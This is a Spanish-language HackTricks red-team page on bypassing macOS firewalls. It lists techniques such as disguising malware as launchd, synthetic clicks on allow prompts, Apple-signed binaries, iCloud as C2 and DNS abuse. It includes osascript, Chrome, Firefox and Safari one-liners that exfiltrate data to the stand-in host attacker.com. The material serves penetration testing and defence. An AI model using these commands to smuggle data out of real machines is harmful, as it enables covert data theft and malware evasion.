4.5 KiB
Evadiendo Firewalls en macOS
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al grupo de 💬 Discord o al grupo de telegram o sigue a Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github de HackTricks y HackTricks Cloud.
Técnicas encontradas
Las siguientes técnicas se han encontrado funcionales en algunas aplicaciones de firewall de macOS.
Abusando de nombres en la lista blanca
- Por ejemplo, nombrar el malware con nombres de procesos de macOS bien conocidos como
launchd
Click Sintético
- Si el firewall pide permiso al usuario, hacer que el malware haga clic en permitir
Usar binarios firmados por Apple
- Como
curl, pero también otros comowhois
Dominios conocidos de Apple
El firewall podría estar permitiendo conexiones a dominios conocidos de Apple como apple.com o icloud.com. Y iCloud podría usarse como un C2.
Evasión Genérica
Algunas ideas para intentar evadir firewalls
Verificar tráfico permitido
Conocer el tráfico permitido te ayudará a identificar dominios potencialmente en la lista blanca o qué aplicaciones tienen permiso para acceder a ellos
lsof -i TCP -sTCP:ESTABLISHED
Abusando de DNS
Las resoluciones de DNS se realizan a través de la aplicación firmada mdnsreponder, que probablemente estará permitida para contactar a los servidores DNS.
A través de aplicaciones de navegador
- osascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
A través de inyecciones en procesos
Si puedes inyectar código en un proceso que tiene permiso para conectarse a cualquier servidor, podrías eludir las protecciones del firewall:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Referencias
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub HackTricks y HackTricks Cloud.